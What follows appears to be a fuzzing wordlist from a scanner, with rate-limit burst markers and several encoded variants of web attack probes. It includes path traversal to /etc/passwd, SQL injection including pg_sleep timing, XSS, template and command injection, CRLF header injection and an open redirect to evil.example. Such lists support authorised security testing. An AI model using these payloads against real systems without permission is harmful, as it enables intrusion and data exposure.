burst=1
burst=2
burst=3
burst=4
burst=5
burst=10
burst=25
burst=50
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
burst%3D1
burst%3D2
burst%3D3
burst%3D4
burst%3D5
burst%3D10
burst%3D25
burst%3D50
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
BURST=1
BURST=2
BURST=3
BURST=4
BURST=5
BURST=10
BURST=25
BURST=50
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
BURST%3D1
BURST%3D2
BURST%3D3
BURST%3D4
BURST%3D5
BURST%3D10
BURST%3D25
BURST%3D50
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
burst=1?v=0
burst=1&v=0
burst%3D1_0
ratelimit_0
/ratelimit/0
burst=1%0a0
burst=2?v=1
burst=2&v=1
burst-0001
BURST-0001
burst-0001?aurose=1
burst-0001&aurose=1
burst-0002
BURST-0002
burst-0002?aurose=1
burst-0002&aurose=1
burst-0003
BURST-0003
burst-0003?aurose=1
burst-0003&aurose=1
burst-0004
BURST-0004
burst-0004?aurose=1
burst-0004&aurose=1
burst-0005
BURST-0005
burst-0005?aurose=1
burst-0005&aurose=1
parallel-req-1
PARALLEL-REQ-1
parallel-req-1?aurose=1
parallel-req-1&aurose=1
parallel-req-2
PARALLEL-REQ-2
parallel-req-2?aurose=1
parallel-req-2&aurose=1
parallel-req-3
PARALLEL-REQ-3
parallel-req-3?aurose=1
parallel-req-3&aurose=1
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
burst-0001::var0
burst-0001::v0
/ratelimit/probe/0
burst-0002::var1
burst-0002::v1
/ratelimit/probe/1
burst-0003::var2
burst-0003::v2
/ratelimit/probe/2
burst-0004::var3
burst-0004::v3
/ratelimit/probe/3
burst-0005::var4
burst-0005::v4
/ratelimit/probe/4
parallel-req-1::var5
parallel-req-1::v5
/ratelimit/probe/5
parallel-req-2::var6
parallel-req-2::v6
/ratelimit/probe/6
parallel-req-3::var7
parallel-req-3::v7
/ratelimit/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/ratelimit/probe/8
" OR "1"="1::var9
%22%20OR%20%221%22%3D%221::v9
/ratelimit/probe/9
' AND 1=1 --::var10
%27%20AND%201%3D1%20--::v10
/ratelimit/probe/10
' AND 1=2 --::var11
%27%20AND%201%3D2%20--::v11
/ratelimit/probe/11
../../../../etc/passwd::var12
..%2F..%2F..%2F..%2Fetc%2Fpasswd::v12
/ratelimit/probe/12
..\..\..\..\windows\win.ini::var13
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini::v13
/ratelimit/probe/13
${7*7}::var14
%24%7B7%2A7%7D::v14
/ratelimit/probe/14
{{7*7}}::var15
%7B%7B7%2A7%7D%7D::v15
/ratelimit/probe/15
<script>alert(document.domain)</script>::var16
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E::v16
/ratelimit/probe/16
